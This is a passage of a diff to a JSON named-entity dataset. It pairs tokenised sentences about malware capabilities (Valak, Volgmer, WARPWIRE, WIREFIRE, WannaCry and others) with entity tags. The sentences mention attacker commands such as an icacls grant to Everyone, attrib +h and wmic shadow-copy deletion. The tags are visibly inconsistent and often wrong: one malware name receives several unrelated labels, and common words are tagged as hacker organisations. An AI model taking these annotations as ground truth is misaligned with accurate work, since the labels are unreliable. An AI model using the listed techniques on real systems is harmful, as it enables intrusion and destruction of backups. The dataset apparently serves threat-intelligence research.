[ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "store", + "information", + "regarding", + "the", + "C2", + "server", + "and", + "downloads", + "in", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\ApplicationContainer\\Appsw64</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "downloaded", + "a", + "variety", + "of", + "modules", + "and", + "payloads", + "to", + "the", + "compromised", + "host,", + "including", + "IcedID", + "and", + "NetSupport", + "Manager", + "RAT-based", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "execute", + "JavaScript", + "containing", + "configuration", + "data", + "for", + "establishing", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "enumerate", + "local", + "admin", + "accounts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Valak", + "has", + "been", + "executed", + "via", + "Microsoft", + "Word", + "documents", + "containing", + "malicious", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "modify", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\ApplicationContainer\\Appsw64</code>", + "to", + "store", + "information", + "regarding", + "the", + "C2", + "server", + "and", + "downloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "download", + "additional", + "modules", + "and", + "malware", + "capable", + "of", + "using", + "separate", + "C2", + "channels." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "save", + "and", + "execute", + "files", + "as", + "alternate", + "data", + "streams", + "(ADS)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "base64", + "encode", + "and", + "XOR", + "encrypt", + "strings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "used", + "PowerShell", + "to", + "download", + "additional", + "modules." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "enumerate", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "use", + "the", + "Registry", + "for", + "code", + "updates", + "and", + "to", + "collect", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "used", + "<code>regsvr32.exe</code>", + "to", + "launch", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "collect", + "sensitive", + "mailing", + "information", + "from", + "Exchange", + "servers,", + "including", + "credentials", + "and", + "the", + "domain", + "certificate", + "of", + "an", + "enterprise." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "used", + "scheduled", + "tasks", + "to", + "execute", + "additional", + "payloads", + "and", + "to", + "gain", + "persistence", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "take", + "screenshots", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "determine", + "if", + "a", + "compromised", + "host", + "has", + "security", + "products", + "installed." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "used", + "packed", + "DLL", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "been", + "delivered", + "via", + "spearphishing", + "e-mails", + "with", + "password", + "protected", + "ZIP", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "been", + "delivered", + "via", + "malicious", + "links", + "in", + "e-mail." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Valak", + "has", + "returned", + "C2", + "data", + "as", + "encoded", + "ASCII." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "determine", + "the", + "Windows", + "version", + "and", + "computer", + "name", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "identify", + "the", + "domain", + "and", + "the", + "MAC", + "and", + "IP", + "addresses", + "of", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "gather", + "information", + "regarding", + "the", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "used", + "HTTP", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "use", + "a", + ".NET", + "compiled", + "module", + "named", + "exchgrabber", + "to", + "enumerate", + "credentials", + "from", + "the", + "Credential", + "Manager." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "use", + "<code>wmic", + "process", + "call", + "create</code>", + "in", + "a", + "scheduled", + "task", + "to", + "launch", + "plugins", + "and", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VaporRage", + "can", + "deobfuscate", + "XOR-encoded", + "shellcode", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VaporRage", + "has", + "the", + "ability", + "to", + "check", + "for", + "the", + "presence", + "of", + "a", + "specific", + "DLL", + "and", + "terminate", + "if", + "it", + "is", + "not", + "found." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VaporRage", + "has", + "the", + "ability", + "to", + "download", + "malicious", + "shellcode", + "to", + "compromised", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VaporRage", + "can", + "use", + "HTTP", + "to", + "download", + "shellcode", + "from", + "compromised", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Vasport", + "can", + "download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Vasport", + "is", + "capable", + "of", + "tunneling", + "though", + "a", + "proxy." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Vasport", + "copies", + "itself", + "to", + "disk", + "and", + "creates", + "an", + "associated", + "run", + "key", + "Registry", + "entry", + "to", + "establish." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Vasport", + "creates", + "a", + "backdoor", + "by", + "making", + "a", + "connection", + "using", + "a", + "HTTP", + "POST." + ], + "ner_tags": [ + "B-Idus", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Some", + "Volgmer", + "variants", + "use", + "SSL", + "to", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "deobfuscates", + "its", + "strings", + "and", + "APIs", + "once", + "its", + "executed." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Volgmer", + "variant", + "is", + "encoded", + "using", + "a", + "simple", + "XOR", + "cipher." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "delete", + "files", + "and", + "itself", + "after", + "infection", + "to", + "avoid", + "analysis." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "list", + "directories", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "stores", + "an", + "encoded", + "configuration", + "file", + "in", + "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "download", + "remote", + "files", + "and", + "additional", + "payloads", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Volgmer", + "variants", + "add", + "new", + "services", + "with", + "display", + "names", + "generated", + "by", + "a", + "list", + "of", + "hard-coded", + "strings", + "such", + "as", + "Application,", + "Background,", + "Security,", + "and", + "Windows,", + "presumably", + "as", + "a", + "way", + "to", + "masquerade", + "as", + "a", + "legitimate", + "service." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "modifies", + "the", + "Registry", + "to", + "store", + "an", + "encoded", + "configuration", + "file", + "in", + "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Volgmer", + "executes", + "payloads", + "using", + "the", + "Windows", + "API", + "call", + "CreateProcessW()." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "gather", + "a", + "list", + "of", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "checks", + "the", + "system", + "for", + "certain", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "uses", + "a", + "simple", + "XOR", + "cipher", + "to", + "encrypt", + "traffic", + "and", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "gather", + "system", + "information,", + "the", + "computer", + "name,", + "OS", + "version,", + "drive", + "and", + "serial", + "information", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "gather", + "the", + "IP", + "address", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "gather", + "information", + "about", + "TCP", + "connection", + "state." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "queries", + "the", + "system", + "to", + "identify", + "existing", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "can", + "execute", + "commands", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volgmer", + "installs", + "a", + "copy", + "of", + "itself", + "in", + "a", + "randomly", + "selected", + "service,", + "then", + "overwrites", + "the", + "ServiceDLL", + "entry", + "in", + "the", + "service's", + "Registry", + "entry.", + "Some", + "Volgmer", + "variants", + "also", + "install", + ".dll", + "files", + "as", + "services", + "with", + "names", + "generated", + "by", + "a", + "list", + "of", + "hard-coded", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WARPWIRE", + "can", + "embed", + "itself", + "into", + "a", + "legitimate", + "file", + "on", + "compromised", + "Ivanti", + "Connect", + "Secure", + "VPNs." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WARPWIRE", + "can", + "send", + "captured", + "credentials", + "to", + "C2", + "via", + "HTTP", + "`GET`", + "or", + "`POST`", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WARPWIRE", + "is", + "a", + "credential", + "harvester", + "written", + "in", + "JavaScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WARPWIRE", + "can", + "Base64", + "encode", + "captured", + "credentials", + "with", + "`btoa()`", + "prior", + "to", + "sending", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WARPWIRE", + "can", + "capture", + "credentials", + "submitted", + "during", + "the", + "web", + "logon", + "process", + "in", + "order", + "to", + "access", + "layer", + "seven", + "applications", + "such", + "as", + "RDP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Variants", + "of", + "WEBC2", + "achieve", + "persistence", + "by", + "using", + "DLL", + "search", + "order", + "hijacking,", + "usually", + "by", + "copying", + "the", + "DLL", + "file", + "to", + "<code>%SYSTEMROOT%</code>", + "(<code>C:\\WINDOWS\\ntshrui.dll</code>)." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WEBC2", + "can", + "download", + "and", + "execute", + "a", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "WEBC2", + "can", + "open", + "an", + "interactive", + "command", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINDSHIELD", + "is", + "capable", + "of", + "file", + "deletion", + "along", + "with", + "other", + "file", + "system", + "interaction." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINDSHIELD", + "C2", + "traffic", + "can", + "communicate", + "via", + "TCP", + "raw", + "sockets." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "WINDSHIELD", + "can", + "gather", + "Registry", + "values." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "WINDSHIELD", + "can", + "gather", + "the", + "victim", + "computer", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINDSHIELD", + "can", + "gather", + "the", + "victim", + "user", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "enumerate", + "active", + "windows." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "create", + "a", + "reverse", + "shell", + "that", + "utilizes", + "statically-linked", + "Wine", + "cmd.exe", + "code", + "to", + "emulate", + "Windows", + "command", + "prompt", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "enumerate", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "gather", + "information", + "about", + "the", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "gather", + "information", + "on", + "the", + "victim", + "username." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WINERACK", + "can", + "enumerate", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "can", + "modify", + "the", + "`visits.py`", + "component", + "of", + "Ivanti", + "Connect", + "Secure", + "VPNs", + "for", + "file", + "download", + "and", + "arbitrary", + "command", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "can", + "decode,", + "decrypt,", + "and", + "decompress", + "data", + "received", + "in", + "C2", + "HTTP", + "`POST`", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "has", + "the", + "ability", + "to", + "download", + "files", + "to", + "compromised", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "can", + "Base64", + "encode", + "process", + "output", + "sent", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "can", + "AES", + "encrypt", + "process", + "output", + "sent", + "from", + "compromised", + "devices", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "can", + "respond", + "to", + "specific", + "HTTP", + "`POST`", + "requests", + "to", + "`/api/v1/cav/client/visits`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIREFIRE", + "is", + "a", + "web", + "shell", + "that", + "can", + "download", + "files", + "to", + "and", + "execute", + "arbitrary", + "commands", + "from", + "compromised", + "Ivanti", + "Connect", + "Secure", + "VPNs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "uses", + "Tor", + "for", + "command", + "and", + "control", + "traffic", + "and", + "routes", + "a", + "custom", + "cryptographic", + "protocol", + "over", + "the", + "Tor", + "circuit." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "encrypts", + "user", + "files", + "and", + "demands", + "that", + "a", + "ransom", + "be", + "paid", + "in", + "Bitcoin", + "to", + "decrypt", + "those", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "uses", + "an", + "exploit", + "in", + "SMBv1", + "to", + "spread", + "itself", + "to", + "other", + "remote", + "systems", + "on", + "a", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "searches", + "for", + "variety", + "of", + "user", + "files", + "by", + "file", + "extension", + "before", + "encrypting", + "them", + "using", + "RSA", + "and", + "AES,", + "including", + "Office,", + "PDF,", + "image,", + "audio,", + "video,", + "source", + "code,", + "archive/compression", + "format,", + "and", + "key", + "and", + "certificate", + "files." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "uses", + "<code>attrib", + "+h</code>", + "to", + "make", + "some", + "of", + "its", + "files", + "hidden." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "uses", + "<code>vssadmin</code>,", + "<code>wbadmin</code>,", + "<code>bcdedit</code>,", + "and", + "<code>wmic</code>", + "to", + "delete", + "and", + "disable", + "operating", + "system", + "recovery", + "features." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "attempts", + "to", + "copy", + "itself", + "to", + "remote", + "computers", + "after", + "gaining", + "access", + "via", + "an", + "SMB", + "exploit." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp" + ] + }, + { + "tokens": [ + "WannaCry", + "uses", + "Tor", + "for", + "command", + "and", + "control", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WannaCry", + "contains", + "a", + "thread", + "that", + "will", + "attempt", + "to", + "scan", + "for", + "new", + "attached", + "drives", + "every", + "few", + "seconds.", + "If", + "one", + "is", + "identified,", + "it", + "will", + "encrypt", + "the", + "files", + "on", + "the", + "attached", + "device." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "enumerates", + "current", + "remote", + "desktop", + "sessions", + "and", + "tries", + "to", + "execute", + "the", + "malware", + "on", + "each", + "session." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "scans", + "its", + "local", + "network", + "segment", + "for", + "remote", + "systems", + "to", + "try", + "to", + "exploit", + "and", + "copy", + "itself", + "to." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "attempts", + "to", + "kill", + "processes", + "associated", + "with", + "Exchange,", + "Microsoft", + "SQL", + "Server,", + "and", + "MySQL", + "to", + "make", + "it", + "possible", + "to", + "encrypt", + "their", + "data", + "stores." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "WannaCry", + "will", + "attempt", + "to", + "determine", + "the", + "local", + "network", + "segment", + "it", + "is", + "a", + "part", + "of." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "uses", + "<code>attrib", + "+h</code>", + "and", + "<code>icacls", + ".", + "/grant", + "Everyone:F", + "/T", + "/C", + "/Q</code>", + "to", + "make", + "some", + "of", + "its", + "files", + "hidden", + "and", + "grant", + "all", + "users", + "full", + "access", + "controls." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "utilizes", + "<code>wmic</code>", + "to", + "delete", + "shadow", + "copies." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WannaCry", + "creates", + "the", + "service", + 